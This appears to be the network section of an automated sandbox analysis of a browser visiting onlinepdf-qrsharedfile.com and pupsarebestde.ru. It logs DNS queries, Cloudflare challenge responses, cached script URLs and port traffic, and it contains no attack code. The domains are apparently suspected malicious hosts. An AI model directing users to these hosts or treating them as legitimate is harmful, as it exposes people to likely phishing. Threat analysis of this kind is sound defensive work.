Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: pupsarebestde.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://pupsarebestde.ru//Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9

Source: global traffic	DNS traffic detected: DNS query: onlinepdf-qrsharedfile.com
Source: global traffic	DNS traffic detected: DNS query: a.nel.cloudflare.com
Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: challenges.cloudflare.com
Source: global traffic	DNS traffic detected: DNS query: cdnjs.cloudflare.com
Source: global traffic	DNS traffic detected: DNS query: pupsarebestde.ru
Source: global traffic	DNS traffic detected: DNS query: cdn.jsdelivr.net
Source: global traffic	DNS traffic detected: DNS query: www.cloudflare.com

Source: unknown

HTTP traffic detected: POST /report/v4?s=TvFYJvG%2BSqK76Yuyebso8vfMPdOyW7kygVBnT%2F9idd2fbCLlibY9k1wVeDdyD8Q7VGQBuT%2FbymWv0bRCeVu96bhRJOKJ2VqEc6hGPnuhuYSPNoOX%2B9fXPNRC%2FvjC7Y%2F%2FMV7i6yO5vQQtPrYfVw%3D%3D HTTP/1.1Host: a.nel.cloudflare.comConnection: keep-aliveContent-Length: 406Content-Type: application/reports+jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9

Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 24 Oct 2024 19:43:35 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeAccept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACritical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originOrigin-Agent-Cluster: ?1Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Content-Options: nosniffX-Frame-Options: SAMEORIGINcf-mitigated: challenge
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 24 Oct 2024 19:43:35 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeAccept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACritical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originOrigin-Agent-Cluster: ?1Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Content-Options: nosniffX-Frame-Options: SAMEORIGINcf-mitigated: challenge
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 19:43:39 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingCache-Control: max-age=14400CF-Cache-Status: EXPIREDReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mEw811O%2FHJoLxzfsR%2FOP8wMv8ga%2FAt11KTonVPyhenV3njFiblcMu01lHQjfxJfbzhYl%2BccPWP62WqaTuPh3BqM5mEP%2ByqT36whQ75OdrMg9hsU%2Fr8qMFnj04pYP7QP2cPVtE60Tp8kn2BD3jw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d7c74ffdba153f4-ATLalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=18526&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2839&recv_bytes=1468&delivery_rate=156557&cwnd=32&unsent_bytes=0&cid=b6a3118136dc3c82&ts=515&x=0"
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 19:43:41 GMTContent-Type: application/jsonContent-Length: 7Connection: closecache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0cf-chl-out: 5BLE21MYytqZr7QS4bvminlfT7+RFY/HRMk=$dcqIoxNdbKh88fX7Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0Lx2dgCAIFAXh5PgLok9soOjQb7E6tn8Y6W6Kw3de%2BO95kbnWGuD4R135At3innduImZ0pCV5CPkMFgYxJgVAViQqeoSjPdhzezQ3yAgMsM%2B8P%2BP%2Bv7ebCsE6gwpk6vIIJKpywg2HoGQYJX2fQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d7c750c6e5b0b95-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1573&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2838&recv_bytes=1178&delivery_rate=1885416&cwnd=236&unsent_bytes=0&cid=4bdbd1fb72989083&ts=151&x=0"
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 19:43:43 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingCache-Control: max-age=14400CF-Cache-Status: EXPIREDReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Q5UhYlhdkRmUeRAntkrRtmQvtgQ3Hj%2BqdfTNmM9tt4kuKLjF%2FytCnq9qtOA7WOcD2GoVGfk70IX%2BNO%2BtrEOzH0ep6R%2B7eFCcvzkbgUdb2LkRwnI5%2FqWi5waS3Cgd0fspb2OR0oqPZa0%2FIQRX9w%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d7c75192bbd462f-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1767&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2838&recv_bytes=1468&delivery_rate=1574768&cwnd=249&unsent_bytes=0&cid=a7176d6bfc3db53c&ts=482&x=0"
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 19:43:44 GMTContent-Type: application/jsonContent-Length: 7Connection: closecf-chl-out: Tgt3HHKuas+ww7PEUd5Gkp66JGjwO8kPWDs=$0i/PijcL06idpMq5cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Server: cloudflareCF-RAY: 8d7c751fc8766bea-DFWalt-svc: h3=":443"; ma=86400
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 19:43:49 GMTContent-Type: application/jsonContent-Length: 7Connection: closecache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0cf-chl-out: /MTcW9GQs3+ygmaf2P0WDCSb5v+lNBXB4lk=$xhn5QrYduOESNnzrServer: cloudflareCF-RAY: 8d7c753c5ff47d5b-DFWalt-svc: h3=":443"; ma=86400
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 19:43:50 GMTContent-Type: application/jsonContent-Length: 7Connection: closecache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0cf-chl-out: /EZWEaXB3pNQJCno7KtYQ7qlAF0qyhMM8BU=$CO+pSTwR9PpIcM2zServer: cloudflareCF-RAY: 8d7c75457eb56b6d-DFWalt-svc: h3=":443"; ma=86400
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 19:43:52 GMTContent-Type: application/jsonContent-Length: 7Connection: closecf-chl-out: EHW9Xp5v33DXIhQTggbfB1NVXHNmI74FIEU=$B4b0fiPmNasTsSQ/cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gfkWb1VtHl9LVdI8YYxxW7VP3CdS8yHUaaZcSak8lY9XJrqpi70Ba2rNT2onygdb%2FjvYO7poO%2FwbPVwYvEXQyl9vBqm2plgYtAjiWR2G%2FfS6hrs8JmpoXnG%2FtGTP4slyZ8wUuVVbD%2FhvQyFFoA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d7c7553981c2e73-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1472&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2838&recv_bytes=1178&delivery_rate=2154761&cwnd=242&unsent_bytes=0&cid=aee59b42130d11a3&ts=153&x=0"
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 19:44:04 GMTContent-Type: application/jsonContent-Length: 7Connection: closecf-chl-out: j1bR4tJFn/VD4tzoj84LABbhUDnQPpTw+Qg=$lYELDy2ipoD7l9EKcache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Server: cloudflareCF-RAY: 8d7c759d9b7b2ca9-DFWalt-svc: h3=":443"; ma=86400
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 19:44:09 GMTContent-Type: application/jsonContent-Length: 7Connection: closecache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0cf-chl-out: CtgnfcYgxitqVdSp+LEqVqdHGqBIsICWZhc=$xdTr35e40M1WtpVSServer: cloudflareCF-RAY: 8d7c75bbe9f7283f-DFWalt-svc: h3=":443"; ma=86400
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 19:44:16 GMTContent-Type: application/jsonContent-Length: 7Connection: closecache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0cf-chl-out: MKY/Ylm4WTUgvRbcFhoXhTIbJxWZo6tRAlk=$kPTLrKCxOyDV1bYBServer: cloudflareCF-RAY: 8d7c75e8aece6b23-DFWalt-svc: h3=":443"; ma=86400
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 19:45:02 GMTContent-Type: application/jsonContent-Length: 7Connection: closecache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0cf-chl-out: ++ULSlzgTKINP9r6hOUlE23/7OMgLi9OzH8=$NmAcuygPnLvcBSy9Server: cloudflareCF-RAY: 8d7c77070d1a6c2e-DFWalt-svc: h3=":443"; ma=86400
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 19:45:07 GMTContent-Type: application/jsonContent-Length: 7Connection: closecf-chl-out: Ky/H5/SXUorQB7rx4Kh0PXiC9YzQZlKb9UY=$FrtGZf/I6GMhK13Tcache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Server: cloudflareCF-RAY: 8d7c772329da6b95-DFWalt-svc: h3=":443"; ma=86400
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 19:45:09 GMTContent-Type: application/jsonContent-Length: 7Connection: closecache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0cf-chl-out: 79JYL+r4psllj4oO5WV8dmsxh68ND9PfS20=$Jg8jNgBy++344dmXServer: cloudflareCF-RAY: 8d7c77330fc0e843-DFWalt-svc: h3=":443"; ma=86400
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 19:45:35 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecache-control: private, no-cache, max-age=0pragma: no-cachevary: Accept-EncodingCF-Cache-Status: BYPASSReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jGohd0QGkj2nCMoSJEZdkLnJRmP5YKWwr1J4afMYGby1EItTly5OY0F3B%2F7TK2grpM%2Fquzp4P1gubZnm2w2aQu7OljGLdPAah%2BXeVBIJZT8T%2FImvdF75V%2BknFC0%2BfcKUVhkn"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d7c77d1ff67a912-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1419&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2842&recv_bytes=1167&delivery_rate=2016713&cwnd=159&unsent_bytes=0&cid=9c8b74725a1d275d&ts=415&x=0"
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 19:45:36 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecache-control: private, no-cache, max-age=0pragma: no-cachevary: Accept-EncodingCF-Cache-Status: BYPASSReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wbQAwU7%2B11A8yD1c8WjB8jwWYi0sgIuxQqYTosmppNsOwCRoPwcR9Oq%2BfsJTZJIT%2B1O3Z%2BsF5FP6KSBxJmyTq3FZJ5dJBs%2BupMVp%2Br%2FpNl5btuk%2FGucSuBizqwbEIO4tza8Z"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d7c77dbebe80c13-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1644&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2841&recv_bytes=1167&delivery_rate=1333947&cwnd=246&unsent_bytes=0&cid=d6c1a2de9fcce96c&ts=263&x=0"

Source: chromecache_195.1.dr	String found in binary or memory: https://cdn.jsdelivr.net/npm/bootstrap
Source: chromecache_171.1.dr, chromecache_205.1.dr	String found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js
Source: chromecache_176.1.dr, chromecache_195.1.dr	String found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.5.0/css/all.min.css
Source: chromecache_171.1.dr, chromecache_205.1.dr	String found in binary or memory: https://challenges.cloudflare.com/turnstile/v0/api.js
Source: chromecache_185.1.dr	String found in binary or memory: https://developers.cloudflare.com/r2/data-access/public-buckets/
Source: chromecache_181.1.dr, chromecache_199.1.dr	String found in binary or memory: https://fontawesome.com
Source: chromecache_181.1.dr, chromecache_199.1.dr	String found in binary or memory: https://fontawesome.com/license/free
Source: chromecache_180.1.dr, chromecache_172.1.dr, chromecache_162.1.dr, chromecache_170.1.dr, chromecache_206.1.dr	String found in binary or memory: https://getbootstrap.com/)
Source: chromecache_180.1.dr, chromecache_172.1.dr, chromecache_162.1.dr, chromecache_170.1.dr, chromecache_206.1.dr	String found in binary or memory: https://github.com/twbs/bootstrap/blob/main/LICENSE)
Source: chromecache_180.1.dr, chromecache_162.1.dr, chromecache_170.1.dr	String found in binary or memory: https://github.com/twbs/bootstrap/graphs/contributors)
Source: chromecache_195.1.dr	String found in binary or memory: https://pupsarebestde.ru//#
Source: chromecache_176.1.dr, chromecache_195.1.dr	String found in binary or memory: https://pupsarebestde.ru//#about
Source: chromecache_176.1.dr, chromecache_195.1.dr	String found in binary or memory: https://pupsarebestde.ru//#classic-cars
Source: chromecache_176.1.dr, chromecache_195.1.dr	String found in binary or memory: https://pupsarebestde.ru//#contact
Source: chromecache_176.1.dr, chromecache_195.1.dr	String found in binary or memory: https://pupsarebestde.ru//#electric-vehicles
Source: chromecache_176.1.dr, chromecache_195.1.dr	String found in binary or memory: https://pupsarebestde.ru//#faq
Source: chromecache_176.1.dr, chromecache_195.1.dr	String found in binary or memory: https://pupsarebestde.ru//#learn-more
Source: chromecache_176.1.dr, chromecache_195.1.dr	String found in binary or memory: https://pupsarebestde.ru//#modern-supercars
Source: chromecache_176.1.dr, chromecache_195.1.dr	String found in binary or memory: https://pupsarebestde.ru//#privacy
Source: chromecache_176.1.dr, chromecache_195.1.dr	String found in binary or memory: https://pupsarebestde.ru//#services
Source: chromecache_176.1.dr, chromecache_195.1.dr	String found in binary or memory: https://pupsarebestde.ru//#terms
Source: chromecache_185.1.dr	String found in binary or memory: https://www.cloudflare.com/favicon.ico

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 60678 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60690 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60729 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 60712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60701 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60669
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60667
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60666
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723
Source: unknown	Network traffic detected: HTTP traffic on port 60753 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60728 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60675
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60674
Source: unknown	Network traffic detected: HTTP traffic on port 60672 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60673
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60672
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60671
Source: unknown	Network traffic detected: HTTP traffic on port 60666 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60670
Source: unknown	Network traffic detected: HTTP traffic on port 60691 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60700 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60679
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60678
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60677
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60676
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 60683 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60717 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60677 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60683
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60682
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60681
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60680
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown	Network traffic detected: HTTP traffic on port 60734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49703
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49701
Source: unknown	Network traffic detected: HTTP traffic on port 49699 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60739
Source: unknown	Network traffic detected: HTTP traffic on port 60702 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49701 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60737
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60735
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60734
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60671 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60749
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60748
Source: unknown	Network traffic detected: HTTP traffic on port 60719 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60744
Source: unknown	Network traffic detected: HTTP traffic on port 60736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60682 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60676 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60724 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60752
Source: unknown	Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60751
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60750
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60755
Source: unknown	Network traffic detected: HTTP traffic on port 60718 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60753
Source: unknown	Network traffic detected: HTTP traffic on port 49698 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 60707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 60713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745
Source: unknown	Network traffic detected: HTTP traffic on port 60726 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60670 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60693 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49699
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49698
Source: unknown	Network traffic detected: HTTP traffic on port 60681 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60709
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60708
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60707
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60706
Source: unknown	Network traffic detected: HTTP traffic on port 60675 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60709 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49700 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60669 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60705
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60704
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60703
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60702
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60701
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60700
Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60719
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60718
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60717
Source: unknown	Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60716
